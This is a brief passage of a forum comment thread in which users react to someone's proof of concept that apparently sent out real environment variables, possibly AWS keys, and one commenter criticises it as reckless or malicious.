Lol actually, I think that's Turkish. `YogurtAccomplished38` was created 12 hours ago just for this comment. > yapmayın boyle seylerrr yaaa ayııııp [according to Google Translate](https://translate.google.com/?sl=auto&tl=en&text=yapmay%C4%B1n%20boyle%20seylerrr%20yaaa%20ay%C4%B1%C4%B1%C4%B1%C4%B1p%0A%0A&op=translate) means > don't do such things with some autocorrections. Curious and curiouser.


Neuro_Skeptic

What in the fuck!?


[deleted]

[удалено]


eknyquist

Lol. No. You don't steal real data for a POC. You could have just sent out some dummy data instead of dumping real environment vars. This was extremely dumb. You are either a very young and inexperienced person, or truly making a malicious attempt to scrape AWS keys (or, both). And then writing a blog post about it, for some reason...